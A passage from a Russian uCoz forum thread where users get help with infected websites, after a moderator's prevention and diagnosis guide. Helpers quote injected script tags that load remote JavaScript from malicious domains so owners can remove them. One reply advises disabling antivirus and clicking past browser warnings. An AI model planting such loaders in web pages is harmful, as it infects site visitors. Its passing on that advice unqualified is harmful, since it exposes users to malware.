Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
Вирусы на сайтах
Модератор форума
Сообщение # 1 | 22:08:04 21 Июн 2010
Как предотвратить попадание вредоносных ссылок на сайт

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.

  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.

  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса

  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.

  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




Диагностика

  • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
    В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
  • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
  • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
    Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


Правила подачи заявки на диагностику и поиск вредоносного кода на сайте

  • Вы должны предоставить ссылку на сайт!

  • Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка)

    2) проблема обнаруживается только под логином или под гостем тоже

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки


    Полезные ссылки:


    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:


    Slav3a
    Сообщений: 6
    Репутация: 0

    Сообщение # 1651 | 21:02:13 11 Янв 2015
    Попробовал зайти с сафари гостем - все хорошо. Зашел в учетку через сафари - баннер всплыл как обычно.
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1652 | 21:04:03 11 Янв 2015
    Slav3a, тестовый логин и пароль предоставьте
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Slav3a
    Сообщений: 6
    Репутация: 0

    Сообщение # 1653 | 10:59:44 12 Янв 2015
    Отправил в ЛС с темой Вирусы

    Добавлено (12 Янв 2015, 10:59:44)
    ---------------------------------------------
    webanet, помогите, пожалуйста. Все сделал, как вы просили.

    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1654 | 18:05:47 12 Янв 2015
    Slav3a, это рекламный баннер системы
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Slav3a
    Сообщений: 6
    Репутация: 0

    Сообщение # 1655 | 18:07:57 12 Янв 2015
    Вы хотите сказать, что так и должно быть?
    tyrbo924
    Сообщений: 9
    Репутация: 0

    Сообщение # 1656 | 19:37:01 12 Янв 2015
    Приветствую Вас. Яндекс не дает зайти на сайт, пишет что он вредоносный, адрес сайта http://vmvracing.ucoz.ru/ что делать?
    medved6969
    Сообщений: 7
    Репутация: 0

    Сообщение # 1657 | 22:35:32 13 Янв 2015
    Добрый вечер! Люди, которые пытаются зайти на мой сайт http://medved6969.narod.ru/, не могут этого сделать, т к их антивирусы пишут что сайт заражён!!! Подскажите пожалуйста как это исправить? Спасибо большое!!!
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1658 | 22:48:55 13 Янв 2015
    medved6969, удалите скрипт

    Код
    <SCRIPT language=JavaScript>
    if (navigator.appName=="Microsoft Internet Explorer") {
         width=document.body.clientWidth;
         height=document.body.clientHeight;
    }
    else {
         width=window.innerWidth;
         height=window.innerHeight;
    }
    if (((width-468) / 2)<150) width=468+300;
    document.write('<div style="position: absolute; left: ' + ((width - 468) / 2) + '; top: 6"></div><!--b07739--><script type="text/javascript" src="http://grabaride.tk/smartphone/jbchdjdn.php?id=2866497"></script><!--/b07739-->

    ');

    </SCRIPT>

    и
    Код
    <!--de65c4--><script type="text/javascript" src="http://cms.edu-guide.ru/7h4RkKwp.php?id=248840"></script><!--/de65c4-->

    и я бы код смс рассылки отключила на случай робото-проверки по поведенческому
    дальше пишите в тех.поддержки антивирусов. адрес в блок листе. чтобы вынуть его оттуда нужно договариваться с антивирусами, блокирующими сайт
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    tyrbo924
    Сообщений: 9
    Репутация: 0

    Сообщение # 1659 | 22:59:54 13 Янв 2015
    Яндекс не дает зайти на сайт, пишет что он вредоносный, адрес сайтаhttp://vmvracing.ucoz.ru/ что делать?
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1660 | 23:10:39 13 Янв 2015
    tyrbo924, удаляйте
    Код
    <script src="http://deskmony.info/module/dshow.js" type="text/javascript"></script><script src="http://deskmony.info/module/dshow.js" type="text/javascript"></script><script src="http://deskmony.info/module/dshow.js" type="text/javascript"></script><script src="http://deskmony.info/module/dshow.js" type="text/javascript"></script>
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    tyrbo924
    Сообщений: 9
    Репутация: 0

    Сообщение # 1661 | 21:10:21 14 Янв 2015
    Цитата webanet ()
    tyrbo924, удаляйте<script src="http://deskmony.info/module/dshow.js" type="text/javascript"></script><script src="http://deskmony.info/module/dshow.js" type="text/javascript"></script><script src="http://deskmony.info/module/dshow.js" type="text/javascript"></script><script src="http://deskmony.info/module/dshow.js" type="text/javascript"></script>1
    2
    3
    4
    Я не могу зайти в панель управления, как можно еще удалить этот скрипт?
    akula-z
    Сообщений: 214
    Репутация: 43

    Сообщение # 1662 | 21:44:35 14 Янв 2015
    Здравствуйте.
    Никак не могу понять, что такое происходит с моим сайтом, потому что раньше такого не было. Когда пытаюсь перейти с одной страницы сайта на другую, вместо этого меня автоматически перекидывает на сайт Ютуб.
    Например, на этой странице сайта нажимаю на кнопку Смотреть, чтобы перейти на другую страницу для просмотра конкретной серии, а вместо это открывается страница https://www.youtube.com/ , а страница с серией мультика не отображается. В общем, идет какая-то подмена, вместо страницы сайта на Юкоз перекидывает на Ютуб.
    Помогите, пожалуйста, решить это проблему. Пробовала данную процедуру в разных браузерах и везде одна и та же картина =(
    Забыла добавить, переброс на другой сайт происходит только тогда, когда я захожу на сайт под логином Администратора. Если заходить как гость, то все нормально.
    Сообщение отредактировал akula-z - Среда, 14 Янв 2015, 21:51:15
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1663 | 22:13:18 14 Янв 2015
    akula-z, все нормально с сайтом. перешла по всем ссылкам смотреть и никуда меня не кинуло

    tyrbo924, почему вы не можете зайти в пу? антивирус блокирует или что? если антивирус или браузер. временно отключаем защиту в антивирусе, а в браузере жмем на все равно перейти по ссылке
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    akula-z
    Сообщений: 214
    Репутация: 43

    Сообщение # 1664 | 22:57:30 14 Янв 2015
    webanet, меня кидает до сих пор. Могу показать скриншоты, если надо.
    Скажите, куда мне обратиться за помощью?

    Добавлено (14 Янв 2015, 22:57:30)
    ---------------------------------------------
    У меня даже страница с серией не успевает загрузиться. Тут же выкидывает на это окно


    На сриншоте это не так понятно. Поэтому записала это на видео. Вот ссылка, посмотрите, как это у меня происходит.
    Сообщение отредактировал akula-z - Среда, 14 Янв 2015, 23:14:57
    grafbalkonskij
    Сообщений: 1
    Репутация: 0

    Сообщение # 1665 | 11:31:18 15 Янв 2015
    Здравствуйте.
    Может ли сайт попасть в категорию мошеннических из-за рекламы UCOZ? Ведь там много банеров сайтов, которые просят ввести e-mail ( например, реклама "соблазни богиню" и т.д.). Видимо это считается фишингом. Иначе, почему Mozilla считает сайт graffbalkonsky.narod.ru мошенническим?
    Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
    Поиск: